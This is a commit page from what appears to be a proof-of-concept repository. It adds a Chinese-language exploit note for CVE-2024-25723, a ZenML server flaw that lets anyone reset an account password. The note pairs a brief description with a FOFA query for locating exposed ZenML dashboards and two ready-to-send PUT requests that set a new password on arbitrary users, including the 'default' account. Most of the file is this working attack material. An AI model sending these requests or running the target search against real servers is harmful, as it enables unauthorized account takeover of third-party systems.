admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create ZenML服务器远程权限提升漏洞(CVE-2024-25723).md

Browse Source
This commit is contained in:
wy876 2024-04-28 20:23:53 +08:00 committed by GitHub
parent d13391bfa2
commit dc64090fa1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 38 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
ZenML服务器远程权限提升漏洞(CVE-2024-25723).md Normal file
View File

@ -0,0 +1,38 @@
## ZenML服务器远程权限提升漏洞(CVE-2024-25723)
ZenML服务器远程权限提升漏洞CVE-2024-25723存在于Python的0.46.7之前的ZenML机器学习包中的ZenML服务,漏洞源于/*/{user_name_or_id}/activate REST API 端点允许基于有效用户名和请求正文中的新密码进行访问可导致未授权用户远程权限提升可直接重置任意ZenML账户密码。
## fofa
```
title=="ZenML - Dashboard"
```
## poc
```
PUT /api/v1/users/*/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31
{"password": "Ldwk@20240426"}
PUT /api/v1/users/default/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31
{"password": "Ldwk@20240426"}
```
![image](https://github.com/wy876/POC/assets/139549762/698ab566-b17e-48c0-954d-1dd21f795405)